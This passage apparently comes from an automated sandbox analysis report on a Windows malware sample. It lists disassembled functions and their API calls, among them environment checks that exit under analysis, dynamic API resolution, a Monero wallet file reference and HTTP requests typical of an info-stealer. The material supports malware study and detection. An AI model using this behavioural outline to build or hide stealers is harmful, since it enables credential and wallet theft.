                      • Instruction Fuzzy Hash: 0041C2B1D04298ABDB11DF94CC45BEEBBB9EF08704F144299F5096B2C0D7746A44CBA1
                      Function 003E69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,01082230), ref: 003E98A1
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,010822F0), ref: 003E98BA
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,010821B8), ref: 003E98D2
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,01082440), ref: 003E98EA
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,010823E0), ref: 003E9903
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,01088E60), ref: 003E991B
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,01075690), ref: 003E9933
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,010758B0), ref: 003E994C
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,01082248), ref: 003E9964
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,01082290), ref: 003E997C
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,010823F8), ref: 003E9995
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,01082458), ref: 003E99AD
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,010756F0), ref: 003E99C5
                        • Part of subcall function 003E9860: GetProcAddress.KERNEL32(74DD0000,01082350), ref: 003E99DE
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003D11D0: ExitProcess.KERNEL32 ref: 003D1211
                        • Part of subcall function 003D1160: GetSystemInfo.KERNEL32(?), ref: 003D116A
                        • Part of subcall function 003D1160: ExitProcess.KERNEL32 ref: 003D117E
                        • Part of subcall function 003D1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003D112B
                        • Part of subcall function 003D1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 003D1132
                        • Part of subcall function 003D1110: ExitProcess.KERNEL32 ref: 003D1143
                        • Part of subcall function 003D1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 003D123E
                        • Part of subcall function 003D1220: __aulldiv.LIBCMT ref: 003D1258
                        • Part of subcall function 003D1220: __aulldiv.LIBCMT ref: 003D1266
                        • Part of subcall function 003D1220: ExitProcess.KERNEL32 ref: 003D1294
                        • Part of subcall function 003E6770: GetUserDefaultLangID.KERNEL32 ref: 003E6774
                        • Part of subcall function 003D1190: ExitProcess.KERNEL32 ref: 003D11C6
                        • Part of subcall function 003E7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003D11B7), ref: 003E7880
                        • Part of subcall function 003E7850: RtlAllocateHeap.NTDLL(00000000), ref: 003E7887
                        • Part of subcall function 003E7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003E789F
                        • Part of subcall function 003E78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003E7910
                        • Part of subcall function 003E78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003E7917
                        • Part of subcall function 003E78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003E792F
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01088EE0,?,003F110C,?,00000000,?,003F1110,?,00000000,003F0AEF), ref: 003E6ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003E6AE8
                      • CloseHandle.KERNEL32(00000000), ref: 003E6AF9
                      • Sleep.KERNEL32(00001770), ref: 003E6B04
                      • CloseHandle.KERNEL32(?,00000000,?,01088EE0,?,003F110C,?,00000000,?,003F1110,?,00000000,003F0AEF), ref: 003E6B1A
                      • ExitProcess.KERNEL32 ref: 003E6B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                      • String ID:
                      • API String ID: 2525456742-0
                      • Opcode ID: 7025f6404a48a26060e3058d236130c74d596f9687e38e82d7138518f77fbabb
                      • Instruction ID: 76f5e646dab5702294cc44f529cde6bb898bb9399bc060dc4123514153907e3d
                      • Opcode Fuzzy Hash: 7025f6404a48a26060e3058d236130c74d596f9687e38e82d7138518f77fbabb
                      • Instruction Fuzzy Hash: 2B315071D00269ABDB06FBF2DC57BEE7779AF14340F014619F202AA1D2DF706A05C6A6
                      Function 003D1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1436 3d1220-3d1247 call 3e89b0 GlobalMemoryStatusEx 1439 3d1249-3d1271 call 3eda00 * 2 1436->1439 1440 3d1273-3d127a 1436->1440 1442 3d1281-3d1285 1439->1442 1440->1442 1444 3d129a-3d129d 1442->1444 1445 3d1287 1442->1445 1446 3d1289-3d1290 1445->1446 1447 3d1292-3d1294 ExitProcess 1445->1447 1446->1444 1446->1447
                      APIs
                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 003D123E
                      • __aulldiv.LIBCMT ref: 003D1258
                      • __aulldiv.LIBCMT ref: 003D1266
                      • ExitProcess.KERNEL32 ref: 003D1294
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                      • String ID: @
                      • API String ID: 3404098578-2766056989
                      • Opcode ID: 05135b2daabce40765667b8dfee82f645a6c929ed09baa91cce055ff0fd8950c
                      • Instruction ID: b019087bf726f28c3dd2107960e1c7bc05e7708bcf2e40ab19dcb3f1706706c6
                      • Opcode Fuzzy Hash: 05135b2daabce40765667b8dfee82f645a6c929ed09baa91cce055ff0fd8950c
                      • Instruction Fuzzy Hash: 7C01A2F1D40308BBDB10DBD0DC49B9DB778AB00701F208509F704BA2C0C77556408759
                      Function 003E6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1450 3e6af3 1451 3e6b0a 1450->1451 1453 3e6b0c-3e6b22 call 3e6920 call 3e5b10 CloseHandle ExitProcess 1451->1453 1454 3e6aba-3e6ad7 call 3eaad0 OpenEventA 1451->1454 1460 3e6ad9-3e6af1 call 3eaad0 CreateEventA 1454->1460 1461 3e6af5-3e6b04 CloseHandle Sleep 1454->1461 1460->1453 1461->1451
                      APIs
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01088EE0,?,003F110C,?,00000000,?,003F1110,?,00000000,003F0AEF), ref: 003E6ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003E6AE8
                      • CloseHandle.KERNEL32(00000000), ref: 003E6AF9
                      • Sleep.KERNEL32(00001770), ref: 003E6B04
                      • CloseHandle.KERNEL32(?,00000000,?,01088EE0,?,003F110C,?,00000000,?,003F1110,?,00000000,003F0AEF), ref: 003E6B1A
                      • ExitProcess.KERNEL32 ref: 003E6B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                      • String ID:
                      • API String ID: 941982115-0
                      • Opcode ID: 7ed86420d1bac1a28b7aca34bcbca1a6653d78207dd8b80e86a24a8d2560f88e
                      • Instruction ID: 789c2e6699569a9522644b0edb3f6e671170224802092722862e97ad8bd36178
                      • Opcode Fuzzy Hash: 7ed86420d1bac1a28b7aca34bcbca1a6653d78207dd8b80e86a24a8d2560f88e
                      • Instruction Fuzzy Hash: D4F0547094426AEBE742ABE2DC07BBD7738FB14741F148625F513A51C1CBB05540D656
                      Function 003D47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003D4839
                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 003D4849
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CrackInternetlstrlen
                      • String ID: <
                      • API String ID: 1274457161-4251816714
                      • Opcode ID: b02bfaff02441273ddf893ef325a0340305f90bc8a2a97639ada3056bcd0c8f0
                      • Instruction ID: ca9a9686979c002862ea013a47a0db5eb13863c77034dbe87ac9766c60e6da99
                      • Opcode Fuzzy Hash: b02bfaff02441273ddf893ef325a0340305f90bc8a2a97639ada3056bcd0c8f0
                      • Instruction Fuzzy Hash: 67214FB1D00209ABDF14DFA5E845BDE7B75FB44320F108626F919AB2C1EB706A05CF91
                      Function 003E51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003D6280: InternetOpenA.WININET(003F0DFE,00000001,00000000,00000000,00000000), ref: 003D62E1
                        • Part of subcall function 003D6280: StrCmpCA.SHLWAPI(?,0108E978), ref: 003D6303
                        • Part of subcall function 003D6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003D6335
                        • Part of subcall function 003D6280: HttpOpenRequestA.WININET(00000000,GET,?,0108E0E8,00000000,00000000,00400100,00000000), ref: 003D6385
                        • Part of subcall function 003D6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003D63BF
                        • Part of subcall function 003D6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003D63D1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003E5228
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                      • String ID: ERROR$ERROR
                      • API String ID: 3287882509-2579291623
                      • Opcode ID: a5d2a0a92b090f5d0dccba66f6ffbf24aa708b2449db797c44a5bc3cac73b196
                      • Instruction ID: dac7162027b758330f6d0df314a643185eacd8db5cd7658e4c9f59264f25fdf4
                      • Opcode Fuzzy Hash: a5d2a0a92b090f5d0dccba66f6ffbf24aa708b2449db797c44a5bc3cac73b196
                      • Instruction Fuzzy Hash: 66117030800598ABDB06FFA1ED92AEC3739AF50300F814728F90A4E5D2EF31BB05C691
                      Function 003E78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003E7910
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E7917
                      • GetComputerNameA.KERNEL32(?,00000104), ref: 003E792F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateComputerNameProcess
                      • String ID:
                      • API String ID: 1664310425-0
                      • Opcode ID: 17c0c4e954300e1c7f00365e90a5d16faeb74c0da6d26f0a27bd67ae13315831
                      • Instruction ID: 0d8fa6033dcd0dd315d0289a8888e5b61e3b4b66816537aaafa7501b9b537da9
                      • Opcode Fuzzy Hash: 17c0c4e954300e1c7f00365e90a5d16faeb74c0da6d26f0a27bd67ae13315831
                      • Instruction Fuzzy Hash: 6E016DB1A04249EBCB50DFD9DD45BAABBB8FB04B21F10435AFA45A2680D37459008BA1
                      Function 003D1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003D112B
                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 003D1132
                      • ExitProcess.KERNEL32 ref: 003D1143
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$AllocCurrentExitNumaVirtual
                      • String ID:
                      • API String ID: 1103761159-0
                      • Opcode ID: b6afa398042b8c0b52d999bf2b7478749a3e1a7707e29f55add3a69d9e722b4a
                      • Instruction ID: 926fa99199e6574b1c81e6980e5c7e0be602b956c8d5f93f1b64eb3a38a9975e
                      • Opcode Fuzzy Hash: b6afa398042b8c0b52d999bf2b7478749a3e1a7707e29f55add3a69d9e722b4a
                      • Instruction Fuzzy Hash: 53E0CD7094630CFFE7506BE0EC0EB4C7778EB04B11F109046F7087A2D0C6B426009699
                      Function 003D10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003D10B3
                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003D10F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Virtual$AllocFree
                      • String ID:
                      • API String ID: 2087232378-0
                      • Opcode ID: 4a239d98c746e4b32be51a93ea34509d53c409bd143e00f87287ed3dccedbb40
                      • Instruction ID: 6a7948d82f9873fba42827663054d8b3811056e7a7cca3b5251d6467538287be
                      • Opcode Fuzzy Hash: 4a239d98c746e4b32be51a93ea34509d53c409bd143e00f87287ed3dccedbb40
                      • Instruction Fuzzy Hash: F3F0E2B2A41218BBE714ABA4AC49FAAB7E8E705B15F305449F504E7380D5719F00CAA0
                      Function 003D1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003E78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003E7910
                        • Part of subcall function 003E78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003E7917
                        • Part of subcall function 003E78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003E792F
                        • Part of subcall function 003E7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003D11B7), ref: 003E7880
                        • Part of subcall function 003E7850: RtlAllocateHeap.NTDLL(00000000), ref: 003E7887
                        • Part of subcall function 003E7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003E789F
                      • ExitProcess.KERNEL32 ref: 003D11C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
